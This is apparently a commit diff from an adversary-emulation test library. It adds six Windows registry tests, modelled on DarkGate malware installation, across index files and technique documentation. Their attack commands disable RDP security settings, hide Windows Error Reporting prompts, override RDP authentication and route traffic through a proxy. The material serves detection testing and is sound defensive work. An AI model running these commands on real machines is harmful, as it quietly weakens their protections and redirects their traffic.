Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -299,6 +299,12 @@ defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults
 defense-evasion,T1112,Modify Registry,60,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
 defense-evasion,T1112,Modify Registry,61,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
 defense-evasion,T1112,Modify Registry,62,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
+defense-evasion,T1112,Modify Registry,63,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
+defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
+defense-evasion,T1112,Modify Registry,65,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
+defense-evasion,T1112,Modify Registry,66,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
+defense-evasion,T1112,Modify Registry,67,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
+defense-evasion,T1112,Modify Registry,68,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -204,6 +204,12 @@ defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults
 defense-evasion,T1112,Modify Registry,60,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
 defense-evasion,T1112,Modify Registry,61,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
 defense-evasion,T1112,Modify Registry,62,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
+defense-evasion,T1112,Modify Registry,63,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
+defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
+defense-evasion,T1112,Modify Registry,65,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
+defense-evasion,T1112,Modify Registry,66,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
+defense-evasion,T1112,Modify Registry,67,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
+defense-evasion,T1112,Modify Registry,68,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -368,6 +368,12 @@
   - Atomic Test #60: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
   - Atomic Test #61: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
   - Atomic Test #62: Scarab Ransomware Defense Evasion Activities [windows]
+  - Atomic Test #63: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
+  - Atomic Test #64: Disable Remote Desktop Security Settings Through Registry [windows]
+  - Atomic Test #65: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
+  - Atomic Test #66: Enable Proxy Settings [windows]
+  - Atomic Test #67: Set-Up Proxy Server [windows]
+  - Atomic Test #68: RDP Authentication Level Override [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -259,6 +259,12 @@
   - Atomic Test #60: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
   - Atomic Test #61: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
   - Atomic Test #62: Scarab Ransomware Defense Evasion Activities [windows]
+  - Atomic Test #63: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
+  - Atomic Test #64: Disable Remote Desktop Security Settings Through Registry [windows]
+  - Atomic Test #65: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
+  - Atomic Test #66: Enable Proxy Settings [windows]
+  - Atomic Test #67: Set-Up Proxy Server [windows]
+  - Atomic Test #68: RDP Authentication Level Override [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -12974,6 +12974,116 @@ defense-evasion:
         cleanup_command: 'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters"
           /v AllowEncryptionOracle /t REG_DWORD /d 0 /f
 
+          '
+        name: command_prompt
+    - name: Disable Remote Desktop Anti-Alias Setting Through Registry
+      auto_generated_guid: 61d35188-f113-4334-8245-8c6556d43909
+      description: 'A modification registry to disable RDP anti-alias settings. This
+        technique was seen in DarkGate malware as part of its installation
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
+          NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d
+          1 /f
+
+          '
+        cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
+          NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d
+          0 /f
+
+          '
+        name: command_prompt
+    - name: Disable Remote Desktop Security Settings Through Registry
+      auto_generated_guid: 4b81bcfa-fb0a-45e9-90c2-e3efe5160140
+      description: 'A modification registry to disable RDP security settings. This
+        technique was seen in DarkGate malware as part of its installation
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
+          NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
+
+          '
+        cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
+          NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 0 /f
+
+          '
+        name: command_prompt
+    - name: Disabling ShowUI Settings of Windows Error Reporting (WER)
+      auto_generated_guid: '09147b61-40f6-4b2a-b6fb-9e73a3437c96'
+      description: "A modification registry to disable ShowUI settings of Windows
+        Error Report. This registry setting can influence the behavior of error reporting
+        dialogs or prompt box. \nThis technique was seen in DarkGate malware as part
+        of its installation.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting"
+          /v DontShowUI /t REG_DWORD /d 1 /f
+
+          '
+        cleanup_command: 'reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting"
+          /v DontShowUI /t REG_DWORD /d 0 /f
+
+          '
+        name: command_prompt
+    - name: Enable Proxy Settings
+      auto_generated_guid: eb0ba433-63e5-4a8c-a9f0-27c4192e1336
+      description: 'A modification registry to enable proxy settings. This technique
+        was seen in DarkGate malware as part of its installation.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
+          Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
+
+          '
+        cleanup_command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
+          Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
+
+          '
+        name: command_prompt
+    - name: Set-Up Proxy Server
+      auto_generated_guid: d88a3d3b-d016-4939-a745-03638aafd21b
+      description: 'A modification registry to setup proxy server. This technique
+        was seen in DarkGate malware as part of its installation.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
+          Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
+
+          '
+        cleanup_command: 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
+          Settings" /v ProxyServer
+
+          '
+        name: command_prompt
+    - name: RDP Authentication Level Override
+      auto_generated_guid: 7e7b62e9-5f83-477d-8935-48600f38a3c6
+      description: 'A modification registry to override RDP Authentication Level.
+        This technique was seen in DarkGate malware as part of its installation.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride
+          /t REG_DWORD /d 0 /f
+
+          '
+        cleanup_command: 'reg delete "HKCU\Software\Microsoft\Terminal Server Client"
+          /v AuthenticationLevelOverride
+
           '
         name: command_prompt
   T1574.008:

atomics/Indexes/windows-index.yaml

@@ -10399,6 +10399,116 @@ defense-evasion:
         cleanup_command: 'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters"
           /v AllowEncryptionOracle /t REG_DWORD /d 0 /f
 
+          '
+        name: command_prompt
+    - name: Disable Remote Desktop Anti-Alias Setting Through Registry
+      auto_generated_guid: 61d35188-f113-4334-8245-8c6556d43909
+      description: 'A modification registry to disable RDP anti-alias settings. This
+        technique was seen in DarkGate malware as part of its installation
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
+          NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d
+          1 /f
+
+          '
+        cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
+          NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d
+          0 /f
+
+          '
+        name: command_prompt
+    - name: Disable Remote Desktop Security Settings Through Registry
+      auto_generated_guid: 4b81bcfa-fb0a-45e9-90c2-e3efe5160140
+      description: 'A modification registry to disable RDP security settings. This
+        technique was seen in DarkGate malware as part of its installation
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
+          NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
+
+          '
+        cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
+          NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 0 /f
+
+          '
+        name: command_prompt
+    - name: Disabling ShowUI Settings of Windows Error Reporting (WER)
+      auto_generated_guid: '09147b61-40f6-4b2a-b6fb-9e73a3437c96'
+      description: "A modification registry to disable ShowUI settings of Windows
+        Error Report. This registry setting can influence the behavior of error reporting
+        dialogs or prompt box. \nThis technique was seen in DarkGate malware as part
+        of its installation.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting"
+          /v DontShowUI /t REG_DWORD /d 1 /f
+
+          '
+        cleanup_command: 'reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting"
+          /v DontShowUI /t REG_DWORD /d 0 /f
+
+          '
+        name: command_prompt
+    - name: Enable Proxy Settings
+      auto_generated_guid: eb0ba433-63e5-4a8c-a9f0-27c4192e1336
+      description: 'A modification registry to enable proxy settings. This technique
+        was seen in DarkGate malware as part of its installation.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
+          Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
+
+          '
+        cleanup_command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
+          Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
+
+          '
+        name: command_prompt
+    - name: Set-Up Proxy Server
+      auto_generated_guid: d88a3d3b-d016-4939-a745-03638aafd21b
+      description: 'A modification registry to setup proxy server. This technique
+        was seen in DarkGate malware as part of its installation.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
+          Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
+
+          '
+        cleanup_command: 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
+          Settings" /v ProxyServer
+
+          '
+        name: command_prompt
+    - name: RDP Authentication Level Override
+      auto_generated_guid: 7e7b62e9-5f83-477d-8935-48600f38a3c6
+      description: 'A modification registry to override RDP Authentication Level.
+        This technique was seen in DarkGate malware as part of its installation.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride
+          /t REG_DWORD /d 0 /f
+
+          '
+        cleanup_command: 'reg delete "HKCU\Software\Microsoft\Terminal Server Client"
+          /v AuthenticationLevelOverride
+
           '
         name: command_prompt
   T1574.008:

atomics/T1112/T1112.md

@@ -134,6 +134,18 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #62 - Scarab Ransomware Defense Evasion Activities](#atomic-test-62---scarab-ransomware-defense-evasion-activities)
 
+- [Atomic Test #63 - Disable Remote Desktop Anti-Alias Setting Through Registry](#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry)
+
+- [Atomic Test #64 - Disable Remote Desktop Security Settings Through Registry](#atomic-test-64---disable-remote-desktop-security-settings-through-registry)
+
+- [Atomic Test #65 - Disabling ShowUI Settings of Windows Error Reporting (WER)](#atomic-test-65---disabling-showui-settings-of-windows-error-reporting-wer)
+
+- [Atomic Test #66 - Enable Proxy Settings](#atomic-test-66---enable-proxy-settings)
+
+- [Atomic Test #67 - Set-Up Proxy Server](#atomic-test-67---set-up-proxy-server)
+
+- [Atomic Test #68 - RDP Authentication Level Override](#atomic-test-68---rdp-authentication-level-override)
+
 
 <br/>
 
@@ -2303,4 +2315,197 @@ reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #63 - Disable Remote Desktop Anti-Alias Setting Through Registry
+A modification registry to disable RDP anti-alias settings. This technique was seen in DarkGate malware as part of its installation
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 61d35188-f113-4334-8245-8c6556d43909
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 0 /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #64 - Disable Remote Desktop Security Settings Through Registry
+A modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4b81bcfa-fb0a-45e9-90c2-e3efe5160140
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 0 /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #65 - Disabling ShowUI Settings of Windows Error Reporting (WER)
+A modification registry to disable ShowUI settings of Windows Error Report. This registry setting can influence the behavior of error reporting dialogs or prompt box. 
+This technique was seen in DarkGate malware as part of its installation.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 09147b61-40f6-4b2a-b6fb-9e73a3437c96
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 0 /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #66 - Enable Proxy Settings
+A modification registry to enable proxy settings. This technique was seen in DarkGate malware as part of its installation.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** eb0ba433-63e5-4a8c-a9f0-27c4192e1336
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #67 - Set-Up Proxy Server
+A modification registry to setup proxy server. This technique was seen in DarkGate malware as part of its installation.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d88a3d3b-d016-4939-a745-03638aafd21b
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #68 - RDP Authentication Level Override
+A modification registry to override RDP Authentication Level. This technique was seen in DarkGate malware as part of its installation.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7e7b62e9-5f83-477d-8935-48600f38a3c6
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride
+```
+
+
+
+
+
 <br/>